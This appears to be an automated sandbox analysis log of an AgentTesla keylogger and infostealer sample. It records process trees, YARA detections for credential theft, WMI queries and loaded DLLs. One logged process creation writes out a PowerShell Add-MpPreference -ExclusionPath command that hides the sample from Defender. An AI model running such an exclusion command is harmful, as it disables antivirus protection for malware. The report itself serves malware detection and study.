Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_028C3E50	10_2_028C3E50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_028C4198	10_2_028C4198
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_028CAC90	10_2_028CAC90
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_0666415C	10_2_0666415C
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06666A50	10_2_06666A50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06661F58	10_2_06661F58
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06665D68	10_2_06665D68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06665D5B	10_2_06665D5B
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06677E68	10_2_06677E68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_066766E0	10_2_066766E0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_066756B0	10_2_066756B0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06673570	10_2_06673570
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_0667C268	10_2_0667C268
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_0667B307	10_2_0667B307
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06677788	10_2_06677788
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_0667E498	10_2_0667E498
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06675DD7	10_2_06675DD7
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06670040	10_2_06670040
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_0667003E	10_2_0667003E
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB0F18	12_2_00CB0F18
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB22F1	12_2_00CB22F1
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB2C50	12_2_00CB2C50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB2C60	12_2_00CB2C60
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB0F07	12_2_00CB0F07
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB36A8	12_2_00CB36A8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB37D0	12_2_00CB37D0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_00CB37E0	12_2_00CB37E0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_0292EA00	14_2_0292EA00
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_02924A68	14_2_02924A68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_02923E50	14_2_02923E50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_02924198	14_2_02924198
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_0292AC90	14_2_0292AC90
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067E415C	14_2_067E415C
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067E5370	14_2_067E5370
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067E6A50	14_2_067E6A50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067E5D68	14_2_067E5D68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067E5D58	14_2_067E5D58
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067F7E68	14_2_067F7E68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067F66E0	14_2_067F66E0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067F56B0	14_2_067F56B0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067F3570	14_2_067F3570
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067FC268	14_2_067FC268
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067FB307	14_2_067FB307
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067F7788	14_2_067F7788
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067FE498	14_2_067FE498
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067F5DD7	14_2_067F5DD7
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067F0040	14_2_067F0040
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 14_2_067F003E	14_2_067F003E

Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000003EA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000000.00000002.1724879627.0000000002669000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000003E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000000.00000002.1721569298.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000000.00000002.1729508897.00000000074A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000000.00000002.1724879627.0000000002A05000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000000.00000000.1671736981.00000000002DD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecIfx.exe0 vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000000.00000002.1731244450.0000000009710000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000005.00000002.2918914362.0000000000440000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe, 00000005.00000002.2920013150.0000000001198000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs iNFGd6bDZX.exe
Source: iNFGd6bDZX.exe	Binary or memory string: OriginalFilenamecIfx.exe0 vs iNFGd6bDZX.exe

Source: iNFGd6bDZX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: iNFGd6bDZX.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: newapp.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/9@2/2

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iNFGd6bDZX.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Mutant created: \Sessions\1\BaseNamedObjects\slbTasgBkGoOKE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mv4gxzg.rzl.ps1

Jump to behavior

Source: iNFGd6bDZX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: iNFGd6bDZX.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: iNFGd6bDZX.exe	Virustotal: Detection: 72%
Source: iNFGd6bDZX.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

File read: C:\Users\user\Desktop\iNFGd6bDZX.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Section loaded: iphlpapi.dll	Jump to behavior
